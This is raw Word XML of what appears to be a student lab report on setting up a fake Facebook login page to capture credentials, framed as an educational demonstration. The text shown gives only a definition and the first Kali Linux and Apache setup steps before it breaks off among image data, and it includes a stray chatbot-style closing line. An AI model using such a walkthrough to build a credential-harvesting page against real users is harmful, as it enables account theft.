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A0E89" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial"/>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="00034D15">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="144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CC5524" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="186"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ATTACK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB28D6" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="429" w:right="66"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Phishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738A73A7" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the context of this project, phishing refers to a type of cyberattack where a fake version of a legitimate website (in this case, a fake Facebook login page) is created in a controlled environment to deceive users into entering their login credentials, such as usernames and passwords. These credentials are then captured and stored by the attacker. The purpose of this project is to demonstrate how attackers can create convincing phishing websites to exploit user trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>gather</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sensitive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conducting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attack</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controlled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ethical manner for educational purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183CCAC" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>me</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>know</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>you'd like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to add or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">modify anything </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>further!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584FB7D4" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="247"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="054C1596" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="561"/>
        </w:tabs>
        <w:ind w:left="561" w:hanging="201"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>terminal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>your</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E4DF9A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="561"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="360" w:right="7087" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">server </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162F50E" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487588352" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BBFFC16" wp14:editId="7F36AF21">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>923925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>155143</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2942590" cy="116332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2590" cy="1163320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2942590" cy="1163320"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="5" name="Image 5"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="9525" y="9588"/>
                            <a:ext cx="2923540" cy="1144206"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="6" name="Graphic 6"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4762" y="4762"/>
                            <a:ext cx="2933065" cy="1153795"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2933065" h="1153795">
                                <a:moveTo>
                                  <a:pt x="0" y="1153731"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2933065" y="1153731"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2933065" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="115373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E41209" id="Group 4" o:spid="_x0000_s1026" style="position:absolute;margin-left:72.75pt;margin-top:12.2pt;width:231.7pt;height:91.6pt;z-index:-15728128;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="29425,11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Z/L5sAwAAaAgAAA4AAABkcnMvZTJvRG9jLnhtbJxWa2/TMBT9jsR/&#10;iPJ9S5s+WKN1E2IwTUIwsSE+u46TWDi2sd3H/j33+pGUFTRg0tLr+vjm+Pjc615eH3qR7ZixXMl1&#10;Pj2f5BmTVNVctuv86+OHs4s8s47Imggl2Tp/Yja/vnr96nKvK1aqTomamQySSFvt9TrvnNNVUVja&#10;sZ7Yc6WZhMlGmZ44GJq2qA3ZQ/ZeFOVksiz2ytTaKMqshW9vwmR+5fM3DaPuc9NY5jKxzoGb80/j&#10;nxt8FleXpGoN0R2nkQb5DxY94RJeOqS6IY5kW8NPUvWcGmVV486p6gvVNJwyvwfYzXTybDe3Rm21&#10;30tb7Vs9yATSPtPpv9PST7tbox/0vQnsIfyo6HcLuhR73VbH8zhuR/ChMT0ugk1kB6/o06AoO7iM&#10;wpflal4uViA8hbnpdDmblVFz2sHBnKyj3fsXVhakCi/29AY6mtMK/qNEEJ1I9LKVYJXbGpbHJP1f&#10;5eiJ+b7VZ3Camji+4YK7J+9MODckJXf3nKK6OAA1703G63W+yDNJeiiIu560LFugERMC8aj/yfKN&#10;4PoDFwJVxzgSBTs/s8Nv9hqsdqPotmfShdoxTABnJW3Htc0zU7F+w4CcuauncGRQtw4YasOlC4Vi&#10;nWGOdvj+Bnh8gfJCoqQaJjzpkSduwUZzPfPLalGCCGCL1eLiIqQfXVPOFvPBNfN5OVkiYjh7Umlj&#10;3S1TfYYBMAYmIDipyO6jjZwSJCoZaHh+wAobBHQcmzSE0YmK/1RUDx3RDChg2vGYl+mYb2OL8fuI&#10;GKw62BWO/qDR/M2y9Br5ALCkGjWazSZLUDBU1mL2ZuVNdKQR3QaNjnWBDlUHhUCrLkX0IFOISmKz&#10;FL5ZOnAFqJtn0Cw34ZDA5rgOk2KY7bHKI5cOizxQwfle7dij8kg3lrpHzKbxQEeMkMfYIadvHJBz&#10;WJFw6VP73Md432JAiIRInwEJvkqN6gXMr0xTFiqUZcGNKIC35SAKZDyWXUjUx1sdZbBK8DpVsDXt&#10;5p0w2Y7g3eT/oia/wNDGN8R2AeenIkxIePfoHow2qn6CDrMHt61z+2NLsJ2JOwnmxtsvBSYFmxQY&#10;J94pf0f644J3Ph6+EaNjfTmw3SeVPH5SZgGLK6V6u3Wq4b4GR0aRKNSbj/x15oWLVy/el8djjxp/&#10;IFz9BAAA//8DAFBLAwQKAAAAAAAAACEAb69A8BF5AAAReQAAFQAAAGRycy9tZWRpYS9pbWFnZTEu&#10;anBlZ//Y/+AAEEpGSUYAAQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwK&#10;DAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgA7AJ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